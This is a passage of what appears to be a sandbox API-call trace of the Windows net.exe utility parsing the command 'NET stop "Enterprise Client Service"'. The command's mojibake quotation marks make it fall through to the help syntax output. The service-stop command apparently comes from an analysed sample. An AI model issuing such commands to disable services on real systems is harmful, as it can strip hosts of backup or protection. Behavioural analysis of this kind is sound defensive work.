") returned 0x0 [0211.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0211.593] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.593] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0211.593] _wcsicmp (_String1="CONT", _String2="ΓÇ£Enterprise") returned -848 [0211.593] _wcsicmp (_String1="CONT", _String2="Client") returned 3 [0211.593] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0211.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.593] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0211.593] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0211.593] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.593] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0211.593] _wcsicmp (_String1="FILES", _String2="ΓÇ£Enterprise") returned -845 [0211.593] _wcsicmp (_String1="FILES", _String2="Client") returned 3 [0211.593] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0211.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.594] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0211.594] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0211.594] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.594] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0211.594] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Enterprise") returned -844 [0211.594] _wcsicmp (_String1="GROUPS", _String2="Client") returned 4 [0211.594] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.594] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0211.594] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0211.594] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.594] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0211.594] _wcsicmp (_String1="REPL", _String2="ΓÇ£Enterprise") returned -833 [0211.594] _wcsicmp (_String1="REPL", _String2="Client") returned 15 [0211.594] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0211.594] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.594] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0211.594] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Enterprise") returned -833 [0211.594] _wcsicmp (_String1="REPLICATOR", _String2="Client") returned 15 [0211.594] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.594] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0211.594] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0211.594] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.594] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0211.594] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Enterprise") returned -832 [0211.594] _wcsicmp (_String1="SESSIONS", _String2="Client") returned 16 [0211.594] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0211.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0211.594] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.594] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0211.594] _wcsicmp (_String1="SESS", _String2="ΓÇ£Enterprise") returned -832 [0211.595] _wcsicmp (_String1="SESS", _String2="Client") returned 16 [0211.595] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.595] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0211.595] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0211.595] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.595] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0211.595] _wcsicmp (_String1="STATS", _String2="ΓÇ£Enterprise") returned -832 [0211.595] _wcsicmp (_String1="STATS", _String2="Client") returned 16 [0211.595] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.595] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0211.595] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0211.595] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.595] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0211.595] _wcsicmp (_String1="USERS", _String2="ΓÇ£Enterprise") returned -830 [0211.595] _wcsicmp (_String1="USERS", _String2="Client") returned 18 [0211.595] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.595] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0211.595] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0211.595] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.595] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0211.595] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Enterprise") returned -833 [0211.595] _wcsicmp (_String1="REDIRECTOR", _String2="Client") returned 15 [0211.595] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0211.595] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.595] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0211.595] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Enterprise") returned -833 [0211.595] _wcsicmp (_String1="REDIR", _String2="Client") returned 15 [0211.595] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0211.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0211.596] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.596] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0211.596] _wcsicmp (_String1="RDR", _String2="ΓÇ£Enterprise") returned -833 [0211.596] _wcsicmp (_String1="RDR", _String2="Client") returned 15 [0211.596] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0211.596] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.596] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0211.596] _wcsicmp (_String1="WORK", _String2="ΓÇ£Enterprise") returned -828 [0211.596] _wcsicmp (_String1="WORK", _String2="Client") returned 20 [0211.596] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0211.596] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.596] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0211.596] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Enterprise") returned -828 [0211.596] _wcsicmp (_String1="WKSTA", _String2="Client") returned 20 [0211.596] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0211.596] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.596] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0211.596] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Enterprise") returned -835 [0211.596] _wcsicmp (_String1="PRDR", _String2="Client") returned 13 [0211.596] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0211.596] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0211.596] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0211.596] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Enterprise") returned -847 [0211.596] _wcsicmp (_String1="DEVRDR", _String2="Client") returned 1 [0211.596] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.596] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0211.596] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.596] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0211.596] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0211.596] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0211.597] _wcsicmp (_String1="SVR", _String2="ΓÇ£Enterprise") returned -832 [0211.597] _wcsicmp (_String1="SVR", _String2="Client") returned 16 [0211.597] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0211.597] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0211.597] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.597] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0211.597] _wcsicmp (_String1="SRV", _String2="ΓÇ£Enterprise") returned -832 [0211.597] _wcsicmp (_String1="SRV", _String2="Client") returned 16 [0211.597] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0211.597] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.597] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0xef4a8, nSize=0x0, Arguments=0xef4a4 | out: lpBuffer="㼰Fꔺ瓡") returned 0x1c [0211.597] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0211.597] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0211.597] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0211.597] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0211.597] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0211.597] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0211.597] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0211.597] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.597] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0211.597] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0211.597] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0211.597] wcscpy_s (in: _Destination=0x36a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.597] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0211.598] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x36b338, nSize=0x800, Arguments=0x369dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0211.599] GetFileType (hFile=0x26c) returned 0x3 [0211.599] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x464200 [0211.599] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x464200, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0211.599] WriteFile (in: hFile=0x26c, lpBuffer=0x464200, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0xef488, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef488, lpOverlapped=0x0) returned 0 [0211.599] LocalFree (hMem=0x464200) returned 0x0 [0211.599] GetFileType (hFile=0x26c) returned 0x3 [0211.599] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x463d90 [0211.599] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x463d90, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nF", lpUsedDefaultChar=0x0) returned 2 [0211.599] WriteFile (in: hFile=0x26c, lpBuffer=0x463d90, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef488, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef488, lpOverlapped=0x0) returned 0 [0211.599] LocalFree (hMem=0x463d90) returned 0x0 [0211.599] wcscpy_s (in: _Destination=0xef540, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Enterprise", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Enterprise") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop ΓÇ£Enterprise", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Enterprise ") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop ΓÇ£Enterprise ", _SizeInWords=0x200, _Source="Client", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Enterprise Client") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop ΓÇ£Enterprise Client", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Enterprise Client ") returned 0x0 [0211.599] wcsncat_s (in: _Destination="NET stop ΓÇ£Enterprise Client ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥") returned 0x0 [0211.599] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F댸6\x0eѰ6ɬ") returned 0xad [0211.599] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | N", _MaxCount=0x28) returned 18 [0211.599] LocalFree (hMem=0x465868) returned 0x0 [0211.599] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x2e [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DE", _MaxCount=0x28) returned 16 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x7d [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time", _MaxCount=0x28) returned 16 [0211.600] LocalFree (hMem=0x465868) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x26 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x28) returned 16 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 16 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x1b [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x28) returned 13 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xbe [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]]", _MaxCount=0x28) returned 12 [0211.600] LocalFree (hMem=0x465868) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x33 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comman", _MaxCount=0x28) returned 11 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x28) returned 11 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xc1 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x28) returned 7 [0211.600] LocalFree (hMem=0x465868) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x16 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 3 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x33 [0211.600] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] ", _MaxCount=0x28) returned 15 [0211.600] LocalFree (hMem=0x463f78) returned 0x0 [0211.600] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x234 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharenam", _MaxCount=0x28) returned 12 [0211.601] LocalFree (hMem=0x465868) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x13 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x16 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x11 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree (hMem=0x463f78) returned 0x0 [0211.601] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x12 [0211.601] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x28) returned 14 [0211.601] LocalFree 